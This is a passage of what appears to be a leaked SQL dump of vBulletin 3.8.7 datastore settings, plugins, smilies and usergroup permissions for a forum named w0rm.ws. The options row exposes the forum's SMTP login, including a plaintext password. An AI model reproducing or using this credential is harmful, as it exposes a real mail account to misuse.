('options', 'a:402:{s:16:\"activememberdays\";i:30;s:19:\"activememberoptions\";i:3;s:10:\"addheaders\";i:0;s:14:\"addpolltimeout\";i:0;s:7:\"address\";s:0:\"\";s:15:\"addtemplatename\";i:0;s:10:\"adminpower\";i:10;s:15:\"adminquickstats\";i:0;s:18:\"aggressiveemailban\";i:0;s:14:\"albums_perpage\";i:10;s:26:\"albums_pictures_moderation\";i:0;s:23:\"album_captionpreviewlen\";i:150;s:13:\"album_dataloc\";s:2:\"db\";s:21:\"album_maxpicsperalbum\";i:60;s:13:\"album_picpath\";s:0:\"\";s:22:\"album_pictures_perpage\";i:25;s:21:\"album_recentalbumdays\";i:7;s:15:\"album_thumbpath\";s:0:\"\";s:15:\"album_thumbsize\";i:150;s:14:\"album_thumburl\";s:0:\"\";s:18:\"album_uploadamount\";i:3;s:14:\"allowattachdel\";i:1;s:11:\"allowbbcode\";i:1;s:16:\"allowbbimagecode\";i:0;s:17:\"allowchangestyles\";i:1;s:20:\"allowclosedattachdel\";i:0;s:15:\"allowduplicates\";i:1;s:14:\"allowedbbcodes\";i:1023;s:16:\"allowedreferrers\";s:0:\"\";s:9:\"allowhtml\";i:0;s:20:\"allowkeepbannedemail\";i:1;s:14:\"allowmultiregs\";i:0;s:12:\"allowphpinfo\";i:0;s:17:\"allowregistration\";i:0;s:12:\"allowsmilies\";i:1;s:17:\"allowthreadedmode\";i:1;s:14:\"allowwildcards\";i:1;s:14:\"archiveenabled\";i:1;s:20:\"archive_postsperpage\";i:250;s:22:\"archive_threadsperpage\";i:250;s:18:\"archive_threadtype\";i:1;s:14:\"attachboxcount\";i:1;s:10:\"attachfile\";s:0:\"\";s:11:\"attachlimit\";i:5;s:19:\"attachmentviewslive\";i:0;s:10:\"attachpath\";s:34:\"/path/to/your/attachment/directory\";s:12:\"attachresize\";i:1;s:9:\"attachrow\";i:5;s:12:\"attachthumbs\";i:1;s:16:\"attachthumbssize\";i:100;s:16:\"attachtotalspace\";i:0;s:14:\"attachurlcount\";i:1;s:13:\"avatarenabled\";i:1;s:10:\"avatarpath\";s:15:\"./customavatars\";s:9:\"avatarurl\";s:13:\"customavatars\";s:8:\"badwords\";s:0:\"\";s:8:\"banemail\";s:0:\"\";s:5:\"banip\";s:0:\"\";s:8:\"bbactive\";i:0;s:14:\"bbclosedreason\";s:13:\"Closed
\";s:7:\"bbtitle\";s:7:\"w0rm.ws\";s:5:\"bburl\";s:19:\"https://w0rm.ws:443\";s:15:\"blankasciistrip\";s:31:\"160 173 u8205 u8204 u8237 u8238\";s:11:\"bounceemail\";s:0:\"\";s:11:\"cachemaxage\";i:7;s:10:\"calformat1\";s:6:\"F j, Y\";s:10:\"calformat2\";s:3:\"F j\";s:10:\"censorchar\";s:1:\"*\";s:11:\"censorwords\";s:0:\"\";s:10:\"checkcoppa\";i:0;s:10:\"checknewpm\";i:1;s:11:\"cleargifurl\";s:9:\"clear.gif\";s:12:\"codemaxlines\";i:30;s:11:\"companyname\";s:0:\"\";s:14:\"contactusemail\";s:13:\"forum@w0rm.ws\";s:13:\"contactuslink\";s:15:\"sendmessage.php\";s:16:\"contactusoptions\";s:35:\"Site Feedback\r\nRegistration Problem\";s:14:\"contactusother\";i:0;s:13:\"contactustype\";i:0;s:12:\"cookiedomain\";s:0:\"\";s:10:\"cookiepath\";s:1:\"/\";s:13:\"cookietimeout\";i:900;s:13:\"copypostindex\";i:1;s:13:\"copyrighttext\";s:0:\"\";s:13:\"cpstylefolder\";s:18:\"vBulletin_3_Silver\";s:18:\"cp_collapse_forums\";i:0;s:18:\"cp_usereditcolumns\";i:2;s:11:\"ctCensorMod\";i:1;s:13:\"ctCensorWords\";s:38:\"admin forum moderator vbulletin leader\";s:10:\"ctMaxChars\";i:25;s:10:\"dateformat\";s:5:\"m-d-Y\";s:9:\"datescore\";i:15;s:17:\"defaultregoptions\";i:46629513;s:11:\"description\";s:36:\"w0rm.in * not so public IT community\";s:17:\"disableerroremail\";i:0;s:12:\"disable_ajax\";i:0;s:13:\"displayemails\";i:0;s:15:\"displayloggedin\";i:1;s:8:\"dstonoff\";i:0;s:11:\"editormodes\";s:45:\"a:3:{s:2:\"fe\";i:2;s:2:\"qr\";i:2;s:2:\"qe\";i:2;}\";s:20:\"editthreadtitlelimit\";i:5;s:13:\"edittimelimit\";i:0;s:14:\"emailfloodtime\";i:60;s:12:\"emailsendnum\";i:10;s:12:\"enableaccess\";i:0;s:13:\"enablebanning\";i:1;s:12:\"enablecensor\";i:1;s:11:\"enableemail\";i:0;s:11:\"enablehooks\";i:1;s:16:\"enablememberlist\";i:0;s:9:\"enablepms\";i:1;s:14:\"enablesearches\";i:1;s:13:\"enablespiders\";i:0;s:21:\"enable_inlinemod_auth\";i:1;s:16:\"errorlogdatabase\";s:0:\"\";s:13:\"errorlogemail\";s:0:\"\";s:15:\"errorlogmaxsize\";i:1048576;s:11:\"errorlogphp\";s:0:\"\";s:16:\"errorlogsecurity\";s:0:\"\";s:13:\"externalcache\";i:60;s:13:\"externalcount\";i:15;s:14:\"externalcutoff\";i:30;s:10:\"externaljs\";i:0;s:11:\"externalrss\";i:1;s:11:\"externalxml\";i:0;s:9:\"faxnumber\";s:0:\"\";s:14:\"floodchecktime\";i:30;s:17:\"forumdisplaydepth\";i:2;s:9:\"forumhome\";s:5:\"index\";s:14:\"forumhomedepth\";i:2;s:12:\"forumleaders\";i:0;s:16:\"friends_per_page\";i:10;s:14:\"fulltextsearch\";i:0;s:12:\"globalignore\";s:0:\"\";s:11:\"gm_maxchars\";i:1000;s:13:\"gm_maxperpage\";i:50;s:10:\"gm_perpage\";i:10;s:9:\"goodwords\";s:14:\"vb vbb php sql\";s:13:\"groupiconpath\";s:18:\"./customgroupicons\";s:12:\"groupiconurl\";s:16:\"customgroupicons\";s:9:\"gziplevel\";i:1;s:10:\"gzipoutput\";i:1;s:9:\"hometitle\";s:0:\"\";s:7:\"homeurl\";s:19:\"https://w0rm.ws:443\";s:14:\"hotnumberposts\";i:15;s:14:\"hotnumberviews\";i:150;s:7:\"hvcheck\";i:14;s:23:\"hv_recaptcha_privatekey\";s:0:\"\";s:22:\"hv_recaptcha_publickey\";s:0:\"\";s:18:\"hv_recaptcha_theme\";s:5:\"white\";s:7:\"hv_type\";s:1:\"0\";s:10:\"ie8render7\";i:1;s:10:\"ignoremods\";i:0;s:16:\"ignorequotechars\";i:1;s:16:\"illegalusernames\";s:0:\"\";s:9:\"imagetype\";s:2:\"GD\";s:7:\"ipcheck\";i:1;s:8:\"keywords\";s:12:\"w0rm,w0rm.in\";s:7:\"kppower\";i:100;s:10:\"languageid\";i:1;s:15:\"lastthreadchars\";i:30;s:13:\"legacypostbit\";i:0;s:15:\"lightboxenabled\";i:1;s:11:\"linktopages\";i:1;s:9:\"loadlimit\";i:0;s:13:\"logdateformat\";s:11:\"H:i, jS M Y\";s:5:\"logip\";i:1;s:10:\"magickpath\";s:0:\"\";s:12:\"markinglimit\";i:10;s:9:\"maximages\";i:4;s:12:\"maxmultipage\";i:3;s:13:\"maxpolllength\";i:100;s:14:\"maxpolloptions\";i:10;s:8:\"maxposts\";i:10;s:19:\"maxreputationperday\";i:10;s:10:\"maxresults\";i:500;s:15:\"maxsearchlength\";i:20;s:10:\"maxthreads\";i:20;s:13:\"maxuserlength\";i:25;s:16:\"memberlistfields\";i:0;s:17:\"memberlistperpage\";i:30;s:15:\"memberlistposts\";i:0;s:18:\"minifriends_amount\";i:6;s:18:\"minreputationcount\";i:10;s:17:\"minreputationpost\";i:50;s:15:\"minsearchlength\";i:4;s:13:\"minuserlength\";i:3;s:18:\"moderatenewmembers\";i:0;s:7:\"mqlimit\";i:0;s:15:\"multimatchscore\";i:15;s:10:\"multiquote\";s:1:\"1\";s:13:\"nav_forumdesc\";i:0;s:13:\"needfromemail\";i:0;s:12:\"newuseremail\";s:0:\"\";s:14:\"nocacheheaders\";i:0;s:14:\"noeditedbytime\";i:2;s:17:\"numavatarsperpage\";i:10;s:14:\"numavatarswide\";i:5;s:11:\"oneannounce\";i:1;s:12:\"pagenavpages\";i:3;s:8:\"pagenavs\";s:18:\"10 50 100 500 1000\";s:12:\"paymentemail\";s:0:\"\";s:7:\"pcpower\";i:1000;s:17:\"pc_allowed_bbcode\";i:1091;s:10:\"pc_enabled\";i:1;s:13:\"pc_maxperpage\";i:50;s:13:\"pc_moderation\";i:0;s:10:\"pc_perpage\";i:10;s:11:\"pmfloodtime\";i:60;s:10:\"pmmaxchars\";i:5000;s:12:\"pmmaxperpage\";i:100;s:9:\"pmperpage\";i:50;s:16:\"pmthrottleperiod\";i:0;s:15:\"postedithistory\";i:1;s:12:\"postelements\";i:0;s:14:\"postlog_maxage\";i:7;s:12:\"postmaxchars\";i:10000;s:12:\"postminchars\";i:10;s:14:\"posttitlescore\";i:5;s:10:\"privacyurl\";s:0:\"\";s:15:\"privallowbbcode\";i:1;s:20:\"privallowbbimagecode\";i:1;s:13:\"privallowhtml\";i:0;s:14:\"privallowicons\";i:1;s:16:\"privallowsmilies\";i:1;s:15:\"profilelastpost\";i:0;s:18:\"profilemaxvisitors\";i:10;s:17:\"profilepicenabled\";i:1;s:14:\"profilepicpath\";s:19:\"./customprofilepics\";s:13:\"profilepicurl\";s:17:\"customprofilepics\";s:14:\"profileprivacy\";i:1;s:20:\"profile_album_amount\";i:2;s:9:\"quickedit\";i:1;s:10:\"quickreply\";i:2;s:10:\"quotetitle\";i:0;s:8:\"ratefunc\";s:4:\"none\";s:9:\"ratescore\";d:0.5;s:7:\"rdpower\";i:365;s:14:\"regimageoption\";i:15;s:12:\"regimagetype\";s:0:\"\";s:20:\"registereddateformat\";s:3:\"M Y\";s:9:\"remoteyui\";i:0;s:9:\"replyfunc\";s:4:\"none\";s:10:\"replyscore\";d:0.10000000000000001;s:17:\"reputationdefault\";i:0;s:16:\"reputationenable\";i:1;s:16:\"reputationrepeat\";i:20;s:19:\"reputationundefined\";s:16:\"is off the scale\";s:11:\"reqbirthday\";i:0;s:18:\"requireuniqueemail\";i:1;s:7:\"rpemail\";i:1;s:9:\"rpforumid\";i:0;s:8:\"rpuserid\";s:1:\"0\";s:10:\"rsspodcast\";i:1;s:10:\"safeupload\";i:0;s:15:\"searchfloodtime\";i:0;s:13:\"searchperpage\";i:25;s:13:\"searchsharing\";i:1;s:11:\"secureemail\";i:0;s:14:\"sgd_maxperpage\";i:50;s:11:\"sgd_perpage\";i:10;s:17:\"sg_allowed_bbcode\";i:1091;s:27:\"sg_allow_delete_empty_group\";i:1;s:21:\"sg_allow_join_to_view\";i:0;s:24:\"sg_allow_owner_mod_queue\";i:0;s:22:\"sg_category_cloud_size\";i:40;s:25:\"sg_enablesocialgroupicons\";i:1;s:32:\"sg_enable_owner_only_discussions\";s:1:\"0\";s:22:\"sg_maxdescriptionchars\";i:1000;s:13:\"sg_maxperpage\";i:50;s:16:\"sg_name_maxchars\";i:100;s:18:\"sg_newgroups_count\";i:15;s:10:\"sg_perpage\";i:10;s:13:\"showbirthdays\";i:1;s:11:\"showdeficon\";s:22:\"images/icons/icon1.gif\";s:8:\"showdots\";i:1;s:10:\"showevents\";i:1;s:13:\"showeventtype\";i:0;s:20:\"showforumdescription\";i:1;s:14:\"showforumusers\";i:0;s:12:\"showholidays\";i:1;s:11:\"showimicons\";i:1;s:9:\"showlocks\";i:0;s:19:\"showmoderatorcolumn\";i:0;s:18:\"showprefixlastpost\";i:2;s:17:\"showprivateforums\";s:1:\"0\";s:18:\"showsimilarthreads\";i:1;s:12:\"showstickies\";i:1;s:15:\"showthreadusers\";i:0;s:13:\"showuserrates\";i:5;s:9:\"showvotes\";i:1;s:10:\"sigpicpath\";s:15:\"./signaturepics\";s:9:\"sigpicurl\";s:13:\"signaturepics\";s:19:\"similarthreadsearch\";i:0;s:22:\"similarthreadthreshold\";d:3.5;s:12:\"skypeweb_gfx\";i:1;s:9:\"smcolumns\";i:3;s:7:\"smtotal\";i:15;s:9:\"smtp_host\";s:14:\"smtp.yandex.ru\";s:9:\"smtp_pass\";s:8:\"fb4d56f4\";s:9:\"smtp_port\";i:465;s:8:\"smtp_tls\";s:3:\"ssl\";s:9:\"smtp_user\";s:13:\"forum@w0rm.ws\";s:15:\"socialbookmarks\";i:0;s:17:\"social_moderation\";i:0;s:6:\"socnet\";i:31;s:28:\"socnet_groups_albums_enabled\";i:1;s:25:\"socnet_groups_msg_enabled\";i:1;s:18:\"softlinebreakchars\";i:90;s:12:\"stopshouting\";i:3;s:14:\"storecssasfile\";i:0;s:7:\"styleid\";i:2;s:13:\"subforumdepth\";i:0;s:19:\"subscriptionmethods\";i:0;s:11:\"tagbadwords\";s:0:\"\";s:18:\"tagcloud_cachetime\";i:30;s:15:\"tagcloud_levels\";i:5;s:20:\"tagcloud_searchcloud\";i:1;s:22:\"tagcloud_searchhistory\";i:30;s:13:\"tagcloud_tags\";i:70;s:21:\"tagcloud_usagehistory\";i:365;s:18:\"tagcloud_usergroup\";i:2;s:12:\"tagdelimiter\";s:0:\"\";s:13:\"tagforcelower\";i:1;s:12:\"taggoodwords\";s:0:\"\";s:9:\"tagmaxlen\";i:25;s:13:\"tagmaxstarter\";i:5;s:12:\"tagmaxthread\";i:25;s:10:\"tagmaxuser\";i:2;s:9:\"tagminlen\";i:3;s:15:\"templateversion\";s:5:\"3.8.7\";s:12:\"threadedmode\";i:0;s:18:\"threaded_listdepth\";i:5;s:17:\"threaded_maxcache\";i:40;s:18:\"threaded_trimtitle\";i:30;s:13:\"threadmarking\";s:1:\"0\";s:13:\"threadpreview\";i:150;s:16:\"threadsubscribed\";i:1;s:13:\"threadtagging\";i:1;s:16:\"threadtitlescore\";i:5;s:15:\"threadviewslive\";i:0;s:11:\"threadvoted\";i:0;s:10:\"thumbcolor\";s:7:\"#000000\";s:12:\"thumbquality\";i:75;s:10:\"timeformat\";s:5:\"h:i A\";s:10:\"timeoffset\";i:4;s:19:\"timeoutcontrolpanel\";i:0;s:13:\"titlemaxchars\";i:85;s:7:\"tmppath\";s:4:\"/tmp\";s:6:\"tosurl\";s:0:\"\";s:15:\"twitter_key_pub\";s:0:\"\";s:15:\"twitter_key_sec\";s:0:\"\";s:9:\"uiforumid\";i:0;s:9:\"uimessage\";i:1;s:11:\"unallowhtml\";i:0;s:10:\"unallowimg\";i:1;s:14:\"unallowsmilies\";i:1;s:13:\"unallowvbcode\";i:1;s:14:\"updatelastpost\";i:0;s:13:\"usebulkheader\";i:0;s:8:\"usecoppa\";i:0;s:13:\"usefileavatar\";i:0;s:16:\"usefilegroupicon\";i:0;s:12:\"useforumjump\";i:0;s:17:\"useheaderredirect\";i:1;s:13:\"usehotthreads\";i:1;s:12:\"usemailqueue\";i:1;s:22:\"usememberlistadvsearch\";i:1;s:9:\"usepopups\";i:1;s:29:\"usercss_allowed_border_widths\";s:32:\"small|1px\r\nmedium|2px\r\nlarge|3px\";s:21:\"usercss_allowed_fonts\";s:446:\"arial|Arial, Helvetica, sans-serif\r\ntimes_new_roman|\'Times New Roman\', Times, serif\r\ncourier_new|\'Courier New\', Courier, monospace\r\ngeorgia|Georgia, \'Times New Roman\', Times, serif\r\nverdana|Verdana, Arial, Helvetica, sans-serif\r\ntahoma|Tahoma, Verdana, Arial, Helvetica, sans-serif\r\ngeneva|Geneva, Arial, Helvetica, sans-serif\r\ntrebuchet_ms|\'Trebuchet MS\', Arial, Helvetica, sans-serif\r\ncomic_sans_ms|\'Comic Sans MS\', Arial, Helvetica, sans-serif\";s:26:\"usercss_allowed_font_sizes\";s:39:\"small|small\r\nmedium|medium\r\nlarge|large\";s:23:\"usercss_allowed_padding\";s:80:\"none|0px\r\ntiny|1px\r\nsmall|2px\r\nmedium|3px\r\nlarge|6px\r\nhuge|10px\r\ngargantuan|20px\";s:11:\"usereferrer\";i:1;s:12:\"usermaxposts\";s:13:\"5,10,20,30,40\";s:13:\"usernameregex\";s:0:\"\";s:18:\"usernamereusedelay\";i:365;s:15:\"usestrikesystem\";i:1;s:8:\"use_smtp\";i:1;s:15:\"vb_antispam_key\";s:0:\"\";s:17:\"vb_antispam_posts\";i:0;s:16:\"vb_antispam_type\";i:0;s:11:\"verifyemail\";i:0;s:18:\"viewattachedimages\";i:1;s:8:\"viewfunc\";s:4:\"none\";s:9:\"viewscore\";d:0.01;s:17:\"vm_allowed_bbcode\";i:1091;s:11:\"vm_maxchars\";i:1000;s:13:\"vm_maxperpage\";i:50;s:13:\"vm_moderation\";i:0;s:10:\"vm_perpage\";i:10;s:10:\"votechange\";i:0;s:14:\"webmasteremail\";s:13:\"forum@w0rm.ws\";s:11:\"welcomemail\";i:0;s:9:\"welcomepm\";s:1:\"0\";s:9:\"WOLenable\";i:1;s:9:\"WOLguests\";i:0;s:10:\"WOLrefresh\";i:60;s:10:\"WOLresolve\";i:0;s:8:\"wordwrap\";i:50;s:15:\"wysiwyg_smtotal\";i:15;s:8:\"yestoday\";i:1;}', 1),
('pluginlist', 'a:5:{s:15:\"cache_templates\";s:87:\"if (THIS_SCRIPT == \'profile\')\r\n{\r\n $globaltemplates[] = \'modifyoptions_vbtwitter\';\r\n}\r\n\";s:24:\"postbit_display_complete\";s:683:\"$twitter_find = \'\';\r\n$twitter_add = \'
$vbphrase[twitter_post] \';\r\n\r\nif(strstr($this->registry->templatecache[\'postbit\'], $twitter_add) === false)\r\n{\r\n $this->registry->templatecache[\'postbit\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $this->registry->templatecache[\'postbit\']);\r\n}\r\n\r\nif(strstr($this->registry->templatecache[\'postbit_legacy\'], $twitter_add) === false)\r\n{\r\n $this->registry->templatecache[\'postbit_legacy\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $this->registry->templatecache[\'postbit_legacy\']);\r\n}\r\n\";s:25:\"profile_editoptions_start\";s:127:\"// Add the template\r\neval(\"\\$template_hook[usercp_options_other] .= \\\"\" . fetch_template(\'modifyoptions_vbtwitter\') . \"\\\";\");\r\n\";s:19:\"showthread_complete\";s:527:\"$twitter_find = \'
\r\n $vbphrase[thread_tools] \r\n \';\r\n$twitter_add = \'
\r\n \r\n \';\r\n\r\n$vbulletin->templatecache[\'SHOWTHREAD\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $vbulletin->templatecache[\'SHOWTHREAD\']);\r\n\";s:14:\"userdata_start\";s:131:\"$this->validfields[\'oauth_token\'] = array(TYPE_STR, REQ_NO);\r\n$this->validfields[\'oauth_token_secret\'] = array(TYPE_STR, REQ_NO);\r\n\";}', 1),
('pluginlistadmin', 'a:0:{}', 1),
('prefixcache', 'a:0:{}', 1),
('products', 'a:2:{s:12:\"kk_vbtwitter\";s:1:\"1\";s:9:\"vbulletin\";s:1:\"1\";}', 1),
('ranks', 'a:0:{}', 1),
('searchcloud', 'a:3:{s:4:\"tags\";a:0:{}s:5:\"count\";i:0;s:8:\"dateline\";i:1465211441;}', 1),
('sg_category_cloud', 'a:0:{}', 1),
('sg_newest_groups', 'a:0:{}', 1),
('smiliecache', 'a:11:{i:10;a:7:{s:8:\"smilieid\";s:2:\"10\";s:5:\"title\";s:8:\"Confused\";s:10:\"smilietext\";s:10:\":confused:\";s:10:\"smiliepath\";s:27:\"images/smilies/confused.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:2:\"10\";}i:7;a:7:{s:8:\"smilieid\";s:1:\"7\";s:5:\"title\";s:21:\"Roll Eyes (Sarcastic)\";s:10:\"smilietext\";s:10:\":rolleyes:\";s:10:\"smiliepath\";s:27:\"images/smilies/rolleyes.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"3\";s:9:\"smilielen\";s:2:\"10\";}i:6;a:7:{s:8:\"smilieid\";s:1:\"6\";s:5:\"title\";s:4:\"Cool\";s:10:\"smilietext\";s:6:\":cool:\";s:10:\"smiliepath\";s:23:\"images/smilies/cool.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"5\";s:9:\"smilielen\";s:1:\"6\";}i:9;a:7:{s:8:\"smilieid\";s:1:\"9\";s:5:\"title\";s:4:\"EEK!\";s:10:\"smilietext\";s:5:\":eek:\";s:10:\"smiliepath\";s:22:\"images/smilies/eek.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"7\";s:9:\"smilielen\";s:1:\"5\";}i:8;a:7:{s:8:\"smilieid\";s:1:\"8\";s:5:\"title\";s:3:\"Mad\";s:10:\"smilietext\";s:5:\":mad:\";s:10:\"smiliepath\";s:22:\"images/smilies/mad.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"5\";}i:1;a:7:{s:8:\"smilieid\";s:1:\"1\";s:5:\"title\";s:5:\"Smile\";s:10:\"smilietext\";s:2:\":)\";s:10:\"smiliepath\";s:24:\"images/smilies/smile.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:5;a:7:{s:8:\"smilieid\";s:1:\"5\";s:5:\"title\";s:16:\"Stick Out Tongue\";s:10:\"smilietext\";s:2:\":p\";s:10:\"smiliepath\";s:25:\"images/smilies/tongue.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:4;a:7:{s:8:\"smilieid\";s:1:\"4\";s:5:\"title\";s:4:\"Wink\";s:10:\"smilietext\";s:2:\";)\";s:10:\"smiliepath\";s:23:\"images/smilies/wink.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:3;a:7:{s:8:\"smilieid\";s:1:\"3\";s:5:\"title\";s:8:\"Big Grin\";s:10:\"smilietext\";s:2:\":D\";s:10:\"smiliepath\";s:26:\"images/smilies/biggrin.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:2;a:7:{s:8:\"smilieid\";s:1:\"2\";s:5:\"title\";s:13:\"Embarrassment\";s:10:\"smilietext\";s:2:\":o\";s:10:\"smiliepath\";s:26:\"images/smilies/redface.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:11;a:7:{s:8:\"smilieid\";s:2:\"11\";s:5:\"title\";s:5:\"Frown\";s:10:\"smilietext\";s:2:\":(\";s:10:\"smiliepath\";s:24:\"images/smilies/frown.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}}', 1),
('stylecache', 'a:1:{i:-1;a:1:{i:1;a:2:{i:0;a:5:{s:7:\"styleid\";s:1:\"1\";s:5:\"title\";s:13:\"Default Style\";s:8:\"parentid\";s:2:\"-1\";s:12:\"displayorder\";s:1:\"1\";s:10:\"userselect\";s:1:\"0\";}i:1;a:5:{s:7:\"styleid\";s:1:\"2\";s:5:\"title\";s:13:\"Sleek Passion\";s:8:\"parentid\";s:2:\"-1\";s:12:\"displayorder\";s:1:\"1\";s:10:\"userselect\";s:1:\"1\";}}}}', 1),
('tagcloud', 'a:3:{s:4:\"tags\";a:0:{}s:5:\"count\";i:0;s:8:\"dateline\";i:1464302757;}', 1),
('usergroupcache', 'a:8:{i:4;a:48:{s:11:\"usergroupid\";i:4;s:5:\"title\";s:33:\"(COPPA) Users Awaiting Moderation\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:0:\"\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:1;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:655375;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:1;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:33554499;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:56;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:16;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:192;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:64;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:6;a:48:{s:11:\"usergroupid\";i:6;s:5:\"title\";s:14:\"Administrators\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:13:\"Administrator\";s:15:\"passwordexpires\";i:180;s:15:\"passwordhistory\";i:360;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:5;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:16777215;s:13:\"pmpermissions\";i:7;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:31;s:16:\"adminpermissions\";i:3;s:18:\"genericpermissions\";i:2147483583;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:55;s:20:\"signaturepermissions\";i:237567;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:80;s:15:\"avatarmaxheight\";i:80;s:13:\"avatarmaxsize\";i:20000;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:500;s:15:\"sigpicmaxheight\";i:100;s:13:\"sigpicmaxsize\";i:10000;s:12:\"sigmaximages\";i:0;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:0;s:14:\"sigmaxrawchars\";i:0;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:65535;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:8;a:48:{s:11:\"usergroupid\";i:8;s:5:\"title\";s:12:\"Banned Users\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:6:\"Banned\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:0;s:9:\"pmsendmax\";i:0;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:0;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:0;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:0;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:0;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:0;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:0;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:0;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:7;a:48:{s:11:\"usergroupid\";i:7;s:5:\"title\";s:10:\"Moderators\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:9:\"Moderator\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:5;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:12317183;